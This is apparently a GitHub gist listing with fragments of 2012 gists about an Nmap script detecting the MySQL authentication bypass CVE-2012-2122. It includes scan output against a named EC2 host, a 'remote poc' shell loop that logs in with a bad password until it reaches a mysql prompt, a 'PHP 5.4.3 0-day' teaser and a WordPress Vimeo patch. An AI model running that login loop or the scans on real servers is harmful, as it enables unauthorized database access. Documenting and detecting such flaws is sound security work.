marcwickenden / gist:2918314
Created June 12, 2012 15:47
mysql-auth-bypass nmap -v
# nmap -v -d --script=mysql-auth-bypass.nse -p 3306 -Pn --script-args="userdb=usernames.txt" ec2-46-137-134-79.eu-west-1.compute.amazonaws.com
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-12 14:59 BST
--------------- Timing report ---------------
hostgroups: min 1, max 100000
rtt-timeouts: init 1000, min 100, max 10000
max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
parallelism: min 0, max 0
max-retries: 10, host-timeout: 0
min-rate: 0, max-rate: 0
marcwickenden / gist:2918081
Created June 12, 2012 15:08
mysql-auth-bypass version
-- Version 0.1
-- Created 11/06/2012 - v0.1 - by Marc Wickenden <marc@offensivecoder.com>, based on the NSE script by Patrik Karlsson
marcwickenden / gist:2918069
Created June 12, 2012 15:07
mysql-auth-bypass description
description = [[
Checks for MySQL servers vulnerable to the authentication bypass CVE-2012-2122
posted to http://seclists.org/oss-sec/2012/q2/493
]]
---
-- @output
-- 3306/tcp open mysql
-- | mysql-auth-bypass:
-- |_ user root is vulnerable to auth bypass
marcwickenden / gist:2918126
Created June 12, 2012 15:15
mysql-auth-bypass finish up
socket:close()
end
end
marcwickenden / file1.lua
Created June 12, 2012 15:39
mysql_auth_bypass format_output
return stdnse.format_output(true, result)
end
marcwickenden / gist:2918409
Created June 12, 2012 16:03
mysql-auth-bypass remote poc
root@7E-Marc:~# for i in `seq 1 1000`; do mysql -u nse --password=bad -h ec2-46-137-134-79.eu-west-1.compute.amazonaws.com 2>/dev/null; done
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 756
Server version: 5.5.22-0ubuntu1-log (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
marcwickenden / gist:2918421
Created June 12, 2012 16:05
mysql-auth-bypass nse mysql scripts
root@7E-Marc:~# ls -l /usr/local/share/nmap/scripts/mysql-*
-rw-r--r-- 1 root root 6099 2012-01-08 17:02 /usr/local/share/nmap/scripts/mysql-audit.nse
-rw-r--r-- 1 root root 2268 2012-01-08 17:02 /usr/local/share/nmap/scripts/mysql-brute.nse
-rw-r--r-- 1 root root 2895 2012-01-08 17:02 /usr/local/share/nmap/scripts/mysql-databases.nse
-rw-r--r-- 1 root root 1799 2012-01-08 17:02 /usr/local/share/nmap/scripts/mysql-empty-password.nse
-rw-r--r-- 1 root root 4855 2012-01-08 17:02 /usr/local/share/nmap/scripts/mysql-info.nse
-rw-r--r-- 1 root root 2687 2012-01-08 17:02 /usr/local/share/nmap/scripts/mysql-users.nse
-rw-r--r-- 1 root root 3100 2012-01-08 17:02 /usr/local/share/nmap/scripts/mysql-variables.nse
marcwickenden / gist:2918310
Created June 12, 2012 15:46
mysql-auth-bypass nmap
# nmap --script=mysql-auth-bypass.nse -p 3306 -Pn --script-args="userdb=usernames.txt" ec2-46-137-134-79.eu-west-1.compute.amazonaws.com
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-12 14:58 BST
Nmap scan report for ec2-46-137-134-79.eu-west-1.compute.amazonaws.com (46.137.134.79)
Host is up (0.050s latency).
PORT STATE SERVICE
3306/tcp open mysql
| mysql-auth-bypass:
|_ user nse is vulnerable to auth bypass
marcwickenden / gist:2935754
Created June 15, 2012 10:26
PHP 5.4.3 0-day
root@debian1:/var/www/0day# ls -l
total 4
-rw-r--r-- 1 root root 41 Jun 15 11:25 test.php
root@debian1:/var/www/0day# curl http://localhost/0day/test.php
nothing to see here
root@debian1:/var/www/0day# cp test.php{,~}
root@debian1:/var/www/0day# ls -l
total 8
-rw-r--r-- 1 root root 41 Jun 15 11:25 test.php
-rw-r--r-- 1 root root 41 Jun 15 11:26 test.php~
marcwickenden / responsive.1.6.2-vimeo.patch
Created June 19, 2012 08:41
Patch to add Vimeo support to Responsive Wordpress theme
diff -ruw responsive.1.6.2/footer.php responsive.1.6.2-vimeo/footer.php
--- responsive.1.6.2/footer.php 2012-06-19 09:35:37.495143600 +0100
+++ responsive.1.6.2-vimeo/footer.php 2012-06-19 09:25:42.000000000 +0100
@@ -64,6 +64,10 @@
.'<img src="' . get_stylesheet_directory_uri() . '/icons/youtube-icon.png" width="24" height="24" alt="YouTube">'
.'</a></li>';
+ if (!empty($options['vimeo_uid'])) echo '<li class="vimeo-icon"><a href="' . $options['vimeo_uid'] . '">'
+ .'<img src="' . get_stylesheet_directory_uri() . '/icons/vimeo-icon.png" width="24" height="24" alt="Vimeo">'
+ .'</a></li>';